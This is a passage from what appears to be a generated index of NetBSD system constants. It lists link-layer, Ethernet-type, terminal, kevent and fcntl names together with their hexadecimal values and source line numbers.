DLT_C_HDLC_WITH_DIR = 0xcd constant DLT_DECT (line 198) | DLT_DECT = 0xdd constant DLT_DOCSIS (line 199) | DLT_DOCSIS = 0x8f constant DLT_ECONET (line 200) | DLT_ECONET = 0x73 constant DLT_EN10MB (line 201) | DLT_EN10MB = 0x1 constant DLT_EN3MB (line 202) | DLT_EN3MB = 0x2 constant DLT_ENC (line 203) | DLT_ENC = 0x6d constant DLT_ERF (line 204) | DLT_ERF = 0xc5 constant DLT_ERF_ETH (line 205) | DLT_ERF_ETH = 0xaf constant DLT_ERF_POS (line 206) | DLT_ERF_POS = 0xb0 constant DLT_FC_2 (line 207) | DLT_FC_2 = 0xe0 constant DLT_FC_2_WITH_FRAME_DELIMS (line 208) | DLT_FC_2_WITH_FRAME_DELIMS = 0xe1 constant DLT_FDDI (line 209) | DLT_FDDI = 0xa constant DLT_FLEXRAY (line 210) | DLT_FLEXRAY = 0xd2 constant DLT_FRELAY (line 211) | DLT_FRELAY = 0x6b constant DLT_FRELAY_WITH_DIR (line 212) | DLT_FRELAY_WITH_DIR = 0xce constant DLT_GCOM_SERIAL (line 213) | DLT_GCOM_SERIAL = 0xad constant DLT_GCOM_T1E1 (line 214) | DLT_GCOM_T1E1 = 0xac constant DLT_GPF_F (line 215) | DLT_GPF_F = 0xab constant DLT_GPF_T (line 216) | DLT_GPF_T = 0xaa constant DLT_GPRS_LLC (line 217) | DLT_GPRS_LLC = 0xa9 constant DLT_GSMTAP_ABIS (line 218) | DLT_GSMTAP_ABIS = 0xda constant DLT_GSMTAP_UM (line 219) | DLT_GSMTAP_UM = 0xd9 constant DLT_HDLC (line 220) | DLT_HDLC = 0x10 constant DLT_HHDLC (line 221) | DLT_HHDLC = 0x79 constant DLT_HIPPI (line 222) | DLT_HIPPI = 0xf constant DLT_IBM_SN (line 223) | DLT_IBM_SN = 0x92 constant DLT_IBM_SP (line 224) | DLT_IBM_SP = 0x91 constant DLT_IEEE802 (line 225) | DLT_IEEE802 = 0x6 constant DLT_IEEE802_11 (line 226) | DLT_IEEE802_11 = 0x69 constant DLT_IEEE802_11_RADIO (line 227) | DLT_IEEE802_11_RADIO = 0x7f constant DLT_IEEE802_11_RADIO_AVS (line 228) | DLT_IEEE802_11_RADIO_AVS = 0xa3 constant DLT_IEEE802_15_4 (line 229) | DLT_IEEE802_15_4 = 0xc3 constant DLT_IEEE802_15_4_LINUX (line 230) | DLT_IEEE802_15_4_LINUX = 0xbf constant DLT_IEEE802_15_4_NONASK_PHY (line 231) | DLT_IEEE802_15_4_NONASK_PHY = 0xd7 constant DLT_IEEE802_16_MAC_CPS (line 232) | DLT_IEEE802_16_MAC_CPS = 0xbc constant DLT_IEEE802_16_MAC_CPS_RADIO (line 233) | DLT_IEEE802_16_MAC_CPS_RADIO = 0xc1 constant DLT_IPMB (line 234) | DLT_IPMB = 0xc7 constant DLT_IPMB_LINUX (line 235) | DLT_IPMB_LINUX = 0xd1 constant DLT_IPNET (line 236) | DLT_IPNET = 0xe2 constant DLT_IPV4 (line 237) | DLT_IPV4 = 0xe4 constant DLT_IPV6 (line 238) | DLT_IPV6 = 0xe5 constant DLT_IP_OVER_FC (line 239) | DLT_IP_OVER_FC = 0x7a constant DLT_JUNIPER_ATM1 (line 240) | DLT_JUNIPER_ATM1 = 0x89 constant DLT_JUNIPER_ATM2 (line 241) | DLT_JUNIPER_ATM2 = 0x87 constant DLT_JUNIPER_CHDLC (line 242) | DLT_JUNIPER_CHDLC = 0xb5 constant DLT_JUNIPER_ES (line 243) | DLT_JUNIPER_ES = 0x84 constant DLT_JUNIPER_ETHER (line 244) | DLT_JUNIPER_ETHER = 0xb2 constant DLT_JUNIPER_FRELAY (line 245) | DLT_JUNIPER_FRELAY = 0xb4 constant DLT_JUNIPER_GGSN (line 246) | DLT_JUNIPER_GGSN = 0x85 constant DLT_JUNIPER_ISM (line 247) | DLT_JUNIPER_ISM = 0xc2 constant DLT_JUNIPER_MFR (line 248) | DLT_JUNIPER_MFR = 0x86 constant DLT_JUNIPER_MLFR (line 249) | DLT_JUNIPER_MLFR = 0x83 constant DLT_JUNIPER_MLPPP (line 250) | DLT_JUNIPER_MLPPP = 0x82 constant DLT_JUNIPER_MONITOR (line 251) | DLT_JUNIPER_MONITOR = 0xa4 constant DLT_JUNIPER_PIC_PEER (line 252) | DLT_JUNIPER_PIC_PEER = 0xae constant DLT_JUNIPER_PPP (line 253) | DLT_JUNIPER_PPP = 0xb3 constant DLT_JUNIPER_PPPOE (line 254) | DLT_JUNIPER_PPPOE = 0xa7 constant DLT_JUNIPER_PPPOE_ATM (line 255) | DLT_JUNIPER_PPPOE_ATM = 0xa8 constant DLT_JUNIPER_SERVICES (line 256) | DLT_JUNIPER_SERVICES = 0x88 constant DLT_JUNIPER_ST (line 257) | DLT_JUNIPER_ST = 0xc8 constant DLT_JUNIPER_VP (line 258) | DLT_JUNIPER_VP = 0xb7 constant DLT_LAPB_WITH_DIR (line 259) | DLT_LAPB_WITH_DIR = 0xcf constant DLT_LAPD (line 260) | DLT_LAPD = 0xcb constant DLT_LIN (line 261) | DLT_LIN = 0xd4 constant DLT_LINUX_EVDEV (line 262) | DLT_LINUX_EVDEV = 0xd8 constant DLT_LINUX_IRDA (line 263) | DLT_LINUX_IRDA = 0x90 constant DLT_LINUX_LAPD (line 264) | DLT_LINUX_LAPD = 0xb1 constant DLT_LINUX_SLL (line 265) | DLT_LINUX_SLL = 0x71 constant DLT_LOOP (line 266) | DLT_LOOP = 0x6c constant DLT_LTALK (line 267) | DLT_LTALK = 0x72 constant DLT_MFR (line 268) | DLT_MFR = 0xb6 constant DLT_MOST (line 269) | DLT_MOST = 0xd3 constant DLT_MPLS (line 270) | DLT_MPLS = 0xdb constant DLT_MTP2 (line 271) | DLT_MTP2 = 0x8c constant DLT_MTP2_WITH_PHDR (line 272) | DLT_MTP2_WITH_PHDR = 0x8b constant DLT_MTP3 (line 273) | DLT_MTP3 = 0x8d constant DLT_NULL (line 274) | DLT_NULL = 0x0 constant DLT_PCI_EXP (line 275) | DLT_PCI_EXP = 0x7d constant DLT_PFLOG (line 276) | DLT_PFLOG = 0x75 constant DLT_PFSYNC (line 277) | DLT_PFSYNC = 0x12 constant DLT_PPI (line 278) | DLT_PPI = 0xc0 constant DLT_PPP (line 279) | DLT_PPP = 0x9 constant DLT_PPP_BSDOS (line 280) | DLT_PPP_BSDOS = 0xe constant DLT_PPP_ETHER (line 281) | DLT_PPP_ETHER = 0x33 constant DLT_PPP_PPPD (line 282) | DLT_PPP_PPPD = 0xa6 constant DLT_PPP_SERIAL (line 283) | DLT_PPP_SERIAL = 0x32 constant DLT_PPP_WITH_DIR (line 284) | DLT_PPP_WITH_DIR = 0xcc constant DLT_PRISM_HEADER (line 285) | DLT_PRISM_HEADER = 0x77 constant DLT_PRONET (line 286) | DLT_PRONET = 0x4 constant DLT_RAIF1 (line 287) | DLT_RAIF1 = 0xc6 constant DLT_RAW (line 288) | DLT_RAW = 0xc constant DLT_RAWAF_MASK (line 289) | DLT_RAWAF_MASK = 0x2240000 constant DLT_RIO (line 290) | DLT_RIO = 0x7c constant DLT_SCCP (line 291) | DLT_SCCP = 0x8e constant DLT_SITA (line 292) | DLT_SITA = 0xc4 constant DLT_SLIP (line 293) | DLT_SLIP = 0x8 constant DLT_SLIP_BSDOS (line 294) | DLT_SLIP_BSDOS = 0xd constant DLT_SUNATM (line 295) | DLT_SUNATM = 0x7b constant DLT_SYMANTEC_FIREWALL (line 296) | DLT_SYMANTEC_FIREWALL = 0x63 constant DLT_TZSP (line 297) | DLT_TZSP = 0x80 constant DLT_USB (line 298) | DLT_USB = 0xba constant DLT_USB_LINUX (line 299) | DLT_USB_LINUX = 0xbd constant DLT_USB_LINUX_MMAPPED (line 300) | DLT_USB_LINUX_MMAPPED = 0xdc constant DLT_WIHART (line 301) | DLT_WIHART = 0xdf constant DLT_X2E_SERIAL (line 302) | DLT_X2E_SERIAL = 0xd5 constant DLT_X2E_XORAYA (line 303) | DLT_X2E_XORAYA = 0xd6 constant DT_BLK (line 304) | DT_BLK = 0x6 constant DT_CHR (line 305) | DT_CHR = 0x2 constant DT_DIR (line 306) | DT_DIR = 0x4 constant DT_FIFO (line 307) | DT_FIFO = 0x1 constant DT_LNK (line 308) | DT_LNK = 0xa constant DT_REG (line 309) | DT_REG = 0x8 constant DT_SOCK (line 310) | DT_SOCK = 0xc constant DT_UNKNOWN (line 311) | DT_UNKNOWN = 0x0 constant DT_WHT (line 312) | DT_WHT = 0xe constant ECHO (line 313) | ECHO = 0x8 constant ECHOCTL (line 314) | ECHOCTL = 0x40 constant ECHOE (line 315) | ECHOE = 0x2 constant ECHOK (line 316) | ECHOK = 0x4 constant ECHOKE (line 317) | ECHOKE = 0x1 constant ECHONL (line 318) | ECHONL = 0x10 constant ECHOPRT (line 319) | ECHOPRT = 0x20 constant EMUL_LINUX (line 320) | EMUL_LINUX = 0x1 constant EMUL_LINUX32 (line 321) | EMUL_LINUX32 = 0x5 constant EMUL_MAXID (line 322) | EMUL_MAXID = 0x6 constant ETHERCAP_JUMBO_MTU (line 323) | ETHERCAP_JUMBO_MTU = 0x4 constant ETHERCAP_VLAN_HWTAGGING (line 324) | ETHERCAP_VLAN_HWTAGGING = 0x2 constant ETHERCAP_VLAN_MTU (line 325) | ETHERCAP_VLAN_MTU = 0x1 constant ETHERMIN (line 326) | ETHERMIN = 0x2e constant ETHERMTU (line 327) | ETHERMTU = 0x5dc constant ETHERMTU_JUMBO (line 328) | ETHERMTU_JUMBO = 0x2328 constant ETHERTYPE_8023 (line 329) | ETHERTYPE_8023 = 0x4 constant ETHERTYPE_AARP (line 330) | ETHERTYPE_AARP = 0x80f3 constant ETHERTYPE_ACCTON (line 331) | ETHERTYPE_ACCTON = 0x8390 constant ETHERTYPE_AEONIC (line 332) | ETHERTYPE_AEONIC = 0x8036 constant ETHERTYPE_ALPHA (line 333) | ETHERTYPE_ALPHA = 0x814a constant ETHERTYPE_AMBER (line 334) | ETHERTYPE_AMBER = 0x6008 constant ETHERTYPE_AMOEBA (line 335) | ETHERTYPE_AMOEBA = 0x8145 constant ETHERTYPE_APOLLO (line 336) | ETHERTYPE_APOLLO = 0x80f7 constant ETHERTYPE_APOLLODOMAIN (line 337) | ETHERTYPE_APOLLODOMAIN = 0x8019 constant ETHERTYPE_APPLETALK (line 338) | ETHERTYPE_APPLETALK = 0x809b constant ETHERTYPE_APPLITEK (line 339) | ETHERTYPE_APPLITEK = 0x80c7 constant ETHERTYPE_ARGONAUT (line 340) | ETHERTYPE_ARGONAUT = 0x803a constant ETHERTYPE_ARP (line 341) | ETHERTYPE_ARP = 0x806 constant ETHERTYPE_AT (line 342) | ETHERTYPE_AT = 0x809b constant ETHERTYPE_ATALK (line 343) | ETHERTYPE_ATALK = 0x809b constant ETHERTYPE_ATOMIC (line 344) | ETHERTYPE_ATOMIC = 0x86df constant ETHERTYPE_ATT (line 345) | ETHERTYPE_ATT = 0x8069 constant ETHERTYPE_ATTSTANFORD (line 346) | ETHERTYPE_ATTSTANFORD = 0x8008 constant ETHERTYPE_AUTOPHON (line 347) | ETHERTYPE_AUTOPHON = 0x806a constant ETHERTYPE_AXIS (line 348) | ETHERTYPE_AXIS = 0x8856 constant ETHERTYPE_BCLOOP (line 349) | ETHERTYPE_BCLOOP = 0x9003 constant ETHERTYPE_BOFL (line 350) | ETHERTYPE_BOFL = 0x8102 constant ETHERTYPE_CABLETRON (line 351) | ETHERTYPE_CABLETRON = 0x7034 constant ETHERTYPE_CHAOS (line 352) | ETHERTYPE_CHAOS = 0x804 constant ETHERTYPE_COMDESIGN (line 353) | ETHERTYPE_COMDESIGN = 0x806c constant ETHERTYPE_COMPUGRAPHIC (line 354) | ETHERTYPE_COMPUGRAPHIC = 0x806d constant ETHERTYPE_COUNTERPOINT (line 355) | ETHERTYPE_COUNTERPOINT = 0x8062 constant ETHERTYPE_CRONUS (line 356) | ETHERTYPE_CRONUS = 0x8004 constant ETHERTYPE_CRONUSVLN (line 357) | ETHERTYPE_CRONUSVLN = 0x8003 constant ETHERTYPE_DCA (line 358) | ETHERTYPE_DCA = 0x1234 constant ETHERTYPE_DDE (line 359) | ETHERTYPE_DDE = 0x807b constant ETHERTYPE_DEBNI (line 360) | ETHERTYPE_DEBNI = 0xaaaa constant ETHERTYPE_DECAM (line 361) | ETHERTYPE_DECAM = 0x8048 constant ETHERTYPE_DECCUST (line 362) | ETHERTYPE_DECCUST = 0x6006 constant ETHERTYPE_DECDIAG (line 363) | ETHERTYPE_DECDIAG = 0x6005 constant ETHERTYPE_DECDNS (line 364) | ETHERTYPE_DECDNS = 0x803c constant ETHERTYPE_DECDTS (line 365) | ETHERTYPE_DECDTS = 0x803e constant ETHERTYPE_DECEXPER (line 366) | ETHERTYPE_DECEXPER = 0x6000 constant ETHERTYPE_DECLAST (line 367) | ETHERTYPE_DECLAST = 0x8041 constant ETHERTYPE_DECLTM (line 368) | ETHERTYPE_DECLTM = 0x803f constant ETHERTYPE_DECMUMPS (line 369) | ETHERTYPE_DECMUMPS = 0x6009 constant ETHERTYPE_DECNETBIOS (line 370) | ETHERTYPE_DECNETBIOS = 0x8040 constant ETHERTYPE_DELTACON (line 371) | ETHERTYPE_DELTACON = 0x86de constant ETHERTYPE_DIDDLE (line 372) | ETHERTYPE_DIDDLE = 0x4321 constant ETHERTYPE_DLOG1 (line 373) | ETHERTYPE_DLOG1 = 0x660 constant ETHERTYPE_DLOG2 (line 374) | ETHERTYPE_DLOG2 = 0x661 constant ETHERTYPE_DN (line 375) | ETHERTYPE_DN = 0x6003 constant ETHERTYPE_DOGFIGHT (line 376) | ETHERTYPE_DOGFIGHT = 0x1989 constant ETHERTYPE_DSMD (line 377) | ETHERTYPE_DSMD = 0x8039 constant ETHERTYPE_ECMA (line 378) | ETHERTYPE_ECMA = 0x803 constant ETHERTYPE_ENCRYPT (line 379) | ETHERTYPE_ENCRYPT = 0x803d constant ETHERTYPE_ES (line 380) | ETHERTYPE_ES = 0x805d constant ETHERTYPE_EXCELAN (line 381) | ETHERTYPE_EXCELAN = 0x8010 constant ETHERTYPE_EXPERDATA (line 382) | ETHERTYPE_EXPERDATA = 0x8049 constant ETHERTYPE_FLIP (line 383) | ETHERTYPE_FLIP = 0x8146 constant ETHERTYPE_FLOWCONTROL (line 384) | ETHERTYPE_FLOWCONTROL = 0x8808 constant ETHERTYPE_FRARP (line 385) | ETHERTYPE_FRARP = 0x808 constant ETHERTYPE_GENDYN (line 386) | ETHERTYPE_GENDYN = 0x8068 constant ETHERTYPE_HAYES (line 387) | ETHERTYPE_HAYES = 0x8130 constant ETHERTYPE_HIPPI_FP (line 388) | ETHERTYPE_HIPPI_FP = 0x8180 constant ETHERTYPE_HITACHI (line 389) | ETHERTYPE_HITACHI = 0x8820 constant ETHERTYPE_HP (line 390) | ETHERTYPE_HP = 0x8005 constant ETHERTYPE_IEEEPUP (line 391) | ETHERTYPE_IEEEPUP = 0xa00 constant ETHERTYPE_IEEEPUPAT (line 392) | ETHERTYPE_IEEEPUPAT = 0xa01 constant ETHERTYPE_IMLBL (line 393) | ETHERTYPE_IMLBL = 0x4c42 constant ETHERTYPE_IMLBLDIAG (line 394) | ETHERTYPE_IMLBLDIAG = 0x424c constant ETHERTYPE_IP (line 395) | ETHERTYPE_IP = 0x800 constant ETHERTYPE_IPAS (line 396) | ETHERTYPE_IPAS = 0x876c constant ETHERTYPE_IPV6 (line 397) | ETHERTYPE_IPV6 = 0x86dd constant ETHERTYPE_IPX (line 398) | ETHERTYPE_IPX = 0x8137 constant ETHERTYPE_IPXNEW (line 399) | ETHERTYPE_IPXNEW = 0x8037 constant ETHERTYPE_KALPANA (line 400) | ETHERTYPE_KALPANA = 0x8582 constant ETHERTYPE_LANBRIDGE (line 401) | ETHERTYPE_LANBRIDGE = 0x8038 constant ETHERTYPE_LANPROBE (line 402) | ETHERTYPE_LANPROBE = 0x8888 constant ETHERTYPE_LAT (line 403) | ETHERTYPE_LAT = 0x6004 constant ETHERTYPE_LBACK (line 404) | ETHERTYPE_LBACK = 0x9000 constant ETHERTYPE_LITTLE (line 405) | ETHERTYPE_LITTLE = 0x8060 constant ETHERTYPE_LOGICRAFT (line 406) | ETHERTYPE_LOGICRAFT = 0x8148 constant ETHERTYPE_LOOPBACK (line 407) | ETHERTYPE_LOOPBACK = 0x9000 constant ETHERTYPE_MATRA (line 408) | ETHERTYPE_MATRA = 0x807a constant ETHERTYPE_MAX (line 409) | ETHERTYPE_MAX = 0xffff constant ETHERTYPE_MERIT (line 410) | ETHERTYPE_MERIT = 0x807c constant ETHERTYPE_MICP (line 411) | ETHERTYPE_MICP = 0x873a constant ETHERTYPE_MOPDL (line 412) | ETHERTYPE_MOPDL = 0x6001 constant ETHERTYPE_MOPRC (line 413) | ETHERTYPE_MOPRC = 0x6002 constant ETHERTYPE_MOTOROLA (line 414) | ETHERTYPE_MOTOROLA = 0x818d constant ETHERTYPE_MPLS (line 415) | ETHERTYPE_MPLS = 0x8847 constant ETHERTYPE_MPLS_MCAST (line 416) | ETHERTYPE_MPLS_MCAST = 0x8848 constant ETHERTYPE_MUMPS (line 417) | ETHERTYPE_MUMPS = 0x813f constant ETHERTYPE_NBPCC (line 418) | ETHERTYPE_NBPCC = 0x3c04 constant ETHERTYPE_NBPCLAIM (line 419) | ETHERTYPE_NBPCLAIM = 0x3c09 constant ETHERTYPE_NBPCLREQ (line 420) | ETHERTYPE_NBPCLREQ = 0x3c05 constant ETHERTYPE_NBPCLRSP (line 421) | ETHERTYPE_NBPCLRSP = 0x3c06 constant ETHERTYPE_NBPCREQ (line 422) | ETHERTYPE_NBPCREQ = 0x3c02 constant ETHERTYPE_NBPCRSP (line 423) | ETHERTYPE_NBPCRSP = 0x3c03 constant ETHERTYPE_NBPDG (line 424) | ETHERTYPE_NBPDG = 0x3c07 constant ETHERTYPE_NBPDGB (line 425) | ETHERTYPE_NBPDGB = 0x3c08 constant ETHERTYPE_NBPDLTE (line 426) | ETHERTYPE_NBPDLTE = 0x3c0a constant ETHERTYPE_NBPRAR (line 427) | ETHERTYPE_NBPRAR = 0x3c0c constant ETHERTYPE_NBPRAS (line 428) | ETHERTYPE_NBPRAS = 0x3c0b constant ETHERTYPE_NBPRST (line 429) | ETHERTYPE_NBPRST = 0x3c0d constant ETHERTYPE_NBPSCD (line 430) | ETHERTYPE_NBPSCD = 0x3c01 constant ETHERTYPE_NBPVCD (line 431) | ETHERTYPE_NBPVCD = 0x3c00 constant ETHERTYPE_NBS (line 432) | ETHERTYPE_NBS = 0x802 constant ETHERTYPE_NCD (line 433) | ETHERTYPE_NCD = 0x8149 constant ETHERTYPE_NESTAR (line 434) | ETHERTYPE_NESTAR = 0x8006 constant ETHERTYPE_NETBEUI (line 435) | ETHERTYPE_NETBEUI = 0x8191 constant ETHERTYPE_NOVELL (line 436) | ETHERTYPE_NOVELL = 0x8138 constant ETHERTYPE_NS (line 437) | ETHERTYPE_NS = 0x600 constant ETHERTYPE_NSAT (line 438) | ETHERTYPE_NSAT = 0x601 constant ETHERTYPE_NSCOMPAT (line 439) | ETHERTYPE_NSCOMPAT = 0x807 constant ETHERTYPE_NTRAILER (line 440) | ETHERTYPE_NTRAILER = 0x10 constant ETHERTYPE_OS9 (line 441) | ETHERTYPE_OS9 = 0x7007 constant ETHERTYPE_OS9NET (line 442) | ETHERTYPE_OS9NET = 0x7009 constant ETHERTYPE_PACER (line 443) | ETHERTYPE_PACER = 0x80c6 constant ETHERTYPE_PAE (line 444) | ETHERTYPE_PAE = 0x888e constant ETHERTYPE_PCS (line 445) | ETHERTYPE_PCS = 0x4242 constant ETHERTYPE_PLANNING (line 446) | ETHERTYPE_PLANNING = 0x8044 constant ETHERTYPE_PPP (line 447) | ETHERTYPE_PPP = 0x880b constant ETHERTYPE_PPPOE (line 448) | ETHERTYPE_PPPOE = 0x8864 constant ETHERTYPE_PPPOEDISC (line 449) | ETHERTYPE_PPPOEDISC = 0x8863 constant ETHERTYPE_PRIMENTS (line 450) | ETHERTYPE_PRIMENTS = 0x7031 constant ETHERTYPE_PUP (line 451) | ETHERTYPE_PUP = 0x200 constant ETHERTYPE_PUPAT (line 452) | ETHERTYPE_PUPAT = 0x200 constant ETHERTYPE_RACAL (line 453) | ETHERTYPE_RACAL = 0x7030 constant ETHERTYPE_RATIONAL (line 454) | ETHERTYPE_RATIONAL = 0x8150 constant ETHERTYPE_RAWFR (line 455) | ETHERTYPE_RAWFR = 0x6559 constant ETHERTYPE_RCL (line 456) | ETHERTYPE_RCL = 0x1995 constant ETHERTYPE_RDP (line 457) | ETHERTYPE_RDP = 0x8739 constant ETHERTYPE_RETIX (line 458) | ETHERTYPE_RETIX = 0x80f2 constant ETHERTYPE_REVARP (line 459) | ETHERTYPE_REVARP = 0x8035 constant ETHERTYPE_SCA (line 460) | ETHERTYPE_SCA = 0x6007 constant ETHERTYPE_SECTRA (line 461) | ETHERTYPE_SECTRA = 0x86db constant ETHERTYPE_SECUREDATA (line 462) | ETHERTYPE_SECUREDATA = 0x876d constant ETHERTYPE_SGITW (line 463) | ETHERTYPE_SGITW = 0x817e constant ETHERTYPE_SG_BOUNCE (line 464) | ETHERTYPE_SG_BOUNCE = 0x8016 constant ETHERTYPE_SG_DIAG (line 465) | ETHERTYPE_SG_DIAG = 0x8013 constant ETHERTYPE_SG_NETGAMES (line 466) | ETHERTYPE_SG_NETGAMES = 0x8014 constant ETHERTYPE_SG_RESV (line 467) | ETHERTYPE_SG_RESV = 0x8015 constant ETHERTYPE_SIMNET (line 468) | ETHERTYPE_SIMNET = 0x5208 constant ETHERTYPE_SLOWPROTOCOLS (line 469) | ETHERTYPE_SLOWPROTOCOLS = 0x8809 constant ETHERTYPE_SNA (line 470) | ETHERTYPE_SNA = 0x80d5 constant ETHERTYPE_SNMP (line 471) | ETHERTYPE_SNMP = 0x814c constant ETHERTYPE_SONIX (line 472) | ETHERTYPE_SONIX = 0xfaf5 constant ETHERTYPE_SPIDER (line 473) | ETHERTYPE_SPIDER = 0x809f constant ETHERTYPE_SPRITE (line 474) | ETHERTYPE_SPRITE = 0x500 constant ETHERTYPE_STP (line 475) | ETHERTYPE_STP = 0x8181 constant ETHERTYPE_TALARIS (line 476) | ETHERTYPE_TALARIS = 0x812b constant ETHERTYPE_TALARISMC (line 477) | ETHERTYPE_TALARISMC = 0x852b constant ETHERTYPE_TCPCOMP (line 478) | ETHERTYPE_TCPCOMP = 0x876b constant ETHERTYPE_TCPSM (line 479) | ETHERTYPE_TCPSM = 0x9002 constant ETHERTYPE_TEC (line 480) | ETHERTYPE_TEC = 0x814f constant ETHERTYPE_TIGAN (line 481) | ETHERTYPE_TIGAN = 0x802f constant ETHERTYPE_TRAIL (line 482) | ETHERTYPE_TRAIL = 0x1000 constant ETHERTYPE_TRANSETHER (line 483) | ETHERTYPE_TRANSETHER = 0x6558 constant ETHERTYPE_TYMSHARE (line 484) | ETHERTYPE_TYMSHARE = 0x802e constant ETHERTYPE_UBBST (line 485) | ETHERTYPE_UBBST = 0x7005 constant ETHERTYPE_UBDEBUG (line 486) | ETHERTYPE_UBDEBUG = 0x900 constant ETHERTYPE_UBDIAGLOOP (line 487) | ETHERTYPE_UBDIAGLOOP = 0x7002 constant ETHERTYPE_UBDL (line 488) | ETHERTYPE_UBDL = 0x7000 constant ETHERTYPE_UBNIU (line 489) | ETHERTYPE_UBNIU = 0x7001 constant ETHERTYPE_UBNMC (line 490) | ETHERTYPE_UBNMC = 0x7003 constant ETHERTYPE_VALID (line 491) | ETHERTYPE_VALID = 0x1600 constant ETHERTYPE_VARIAN (line 492) | ETHERTYPE_VARIAN = 0x80dd constant ETHERTYPE_VAXELN (line 493) | ETHERTYPE_VAXELN = 0x803b constant ETHERTYPE_VEECO (line 494) | ETHERTYPE_VEECO = 0x8067 constant ETHERTYPE_VEXP (line 495) | ETHERTYPE_VEXP = 0x805b constant ETHERTYPE_VGLAB (line 496) | ETHERTYPE_VGLAB = 0x8131 constant ETHERTYPE_VINES (line 497) | ETHERTYPE_VINES = 0xbad constant ETHERTYPE_VINESECHO (line 498) | ETHERTYPE_VINESECHO = 0xbaf constant ETHERTYPE_VINESLOOP (line 499) | ETHERTYPE_VINESLOOP = 0xbae constant ETHERTYPE_VITAL (line 500) | ETHERTYPE_VITAL = 0xff00 constant ETHERTYPE_VLAN (line 501) | ETHERTYPE_VLAN = 0x8100 constant ETHERTYPE_VLTLMAN (line 502) | ETHERTYPE_VLTLMAN = 0x8080 constant ETHERTYPE_VPROD (line 503) | ETHERTYPE_VPROD = 0x805c constant ETHERTYPE_VURESERVED (line 504) | ETHERTYPE_VURESERVED = 0x8147 constant ETHERTYPE_WATERLOO (line 505) | ETHERTYPE_WATERLOO = 0x8130 constant ETHERTYPE_WELLFLEET (line 506) | ETHERTYPE_WELLFLEET = 0x8103 constant ETHERTYPE_X25 (line 507) | ETHERTYPE_X25 = 0x805 constant ETHERTYPE_X75 (line 508) | ETHERTYPE_X75 = 0x801 constant ETHERTYPE_XNSSM (line 509) | ETHERTYPE_XNSSM = 0x9001 constant ETHERTYPE_XTP (line 510) | ETHERTYPE_XTP = 0x817d constant ETHER_ADDR_LEN (line 511) | ETHER_ADDR_LEN = 0x6 constant ETHER_CRC_LEN (line 512) | ETHER_CRC_LEN = 0x4 constant ETHER_CRC_POLY_BE (line 513) | ETHER_CRC_POLY_BE = 0x4c11db6 constant ETHER_CRC_POLY_LE (line 514) | ETHER_CRC_POLY_LE = 0xedb88320 constant ETHER_HDR_LEN (line 515) | ETHER_HDR_LEN = 0xe constant ETHER_MAX_LEN (line 516) | ETHER_MAX_LEN = 0x5ee constant ETHER_MAX_LEN_JUMBO (line 517) | ETHER_MAX_LEN_JUMBO = 0x233a constant ETHER_MIN_LEN (line 518) | ETHER_MIN_LEN = 0x40 constant ETHER_PPPOE_ENCAP_LEN (line 519) | ETHER_PPPOE_ENCAP_LEN = 0x8 constant ETHER_TYPE_LEN (line 520) | ETHER_TYPE_LEN = 0x2 constant ETHER_VLAN_ENCAP_LEN (line 521) | ETHER_VLAN_ENCAP_LEN = 0x4 constant EVFILT_AIO (line 522) | EVFILT_AIO = 0x2 constant EVFILT_PROC (line 523) | EVFILT_PROC = 0x4 constant EVFILT_READ (line 524) | EVFILT_READ = 0x0 constant EVFILT_SIGNAL (line 525) | EVFILT_SIGNAL = 0x5 constant EVFILT_SYSCOUNT (line 526) | EVFILT_SYSCOUNT = 0x7 constant EVFILT_TIMER (line 527) | EVFILT_TIMER = 0x6 constant EVFILT_VNODE (line 528) | EVFILT_VNODE = 0x3 constant EVFILT_WRITE (line 529) | EVFILT_WRITE = 0x1 constant EV_ADD (line 530) | EV_ADD = 0x1 constant EV_CLEAR (line 531) | EV_CLEAR = 0x20 constant EV_DELETE (line 532) | EV_DELETE = 0x2 constant EV_DISABLE (line 533) | EV_DISABLE = 0x8 constant EV_ENABLE (line 534) | EV_ENABLE = 0x4 constant EV_EOF (line 535) | EV_EOF = 0x8000 constant EV_ERROR (line 536) | EV_ERROR = 0x4000 constant EV_FLAG1 (line 537) | EV_FLAG1 = 0x2000 constant EV_ONESHOT (line 538) | EV_ONESHOT = 0x10 constant EV_SYSFLAGS (line 539) | EV_SYSFLAGS = 0xf000 constant EXTA (line 540) | EXTA = 0x4b00 constant EXTATTR_CMD_START (line 541) | EXTATTR_CMD_START = 0x1 constant EXTATTR_CMD_STOP (line 542) | EXTATTR_CMD_STOP = 0x2 constant EXTATTR_NAMESPACE_SYSTEM (line 543) | EXTATTR_NAMESPACE_SYSTEM = 0x2 constant EXTATTR_NAMESPACE_USER (line 544) | EXTATTR_NAMESPACE_USER = 0x1 constant EXTB (line 545) | EXTB = 0x9600 constant EXTPROC (line 546) | EXTPROC = 0x800 constant FD_CLOEXEC (line 547) | FD_CLOEXEC = 0x1 constant FD_SETSIZE (line 548) | FD_SETSIZE = 0x100 constant FLUSHO (line 549) | FLUSHO = 0x800000 constant F_CLOSEM (line 550) | F_CLOSEM = 0xa constant F_DUPFD (line 551) | F_DUPFD = 0x0 constant F_DUPFD_CLOEXEC (line 552) | F_DUPFD_CLOEXEC = 0xc constant F_FSCTL (line 553) | F_FSCTL = -0x80000000 constant F_FSDIRMASK (line 554) | F_FSDIRMASK = 0x70000000 constant F_FSIN (line 555) | F_FSIN = 0x10000000 constant F_FSINOUT (line 556) | F_FSINOUT = 0x30000000 constant F_FSOUT (line 557) | F_FSOUT = 0x20000000 constant F_FSPRIV (line 558) | F_FSPRIV = 0x8000 constant F_FSVOID (line 559) | F_FSVOID = 0x40000000 constant F_GETFD (line 560) | F_GETFD = 0x1 constant F_GETFL (line 561) | F_GETFL = 0x3 constant F_GETLK (line 562) | F_GETLK = 0x7 constant F_GETNOSIGPIPE (line 563) | F_GETNOSIGPIPE = 0xd constant F_GETOWN (line 564) | F_GETOWN = 0x5 constant F_MAXFD (line 565) | F_MAXFD = 0xb constant F_OK (line 566) | F_OK = 0x0 constant F_PARAM_MASK (line 567) | F_PARAM_MASK = 0xfff constant F_PARAM_MAX (line 568) | F_PARAM_MAX = 0xfff constant F_RDLCK (line 569) | F_RDLCK = 0x1 constant F_SETFD (line 570) | F_SETFD = 0x2 constant F_SETFL (line 571) | F_SETFL = 0x4 constant F_SETLK (line 572) | F_SETLK = 0x8 constant F_SETLKW (line 573) | F_SETLKW = 0x9 constant F_SETNOSIGPIPE (line 574) | F_SETNOSIGPIPE = 0xe constant F_SETOWN (line 575) | F_SETOWN = 0x6 constant F_UNLCK (line 576) | F_UNLCK = 0x2 constant F_WRLCK (line 577) | F_WRLCK = 0x3 constant HUPCL (line 578) | HUPCL = 0x4000 constant 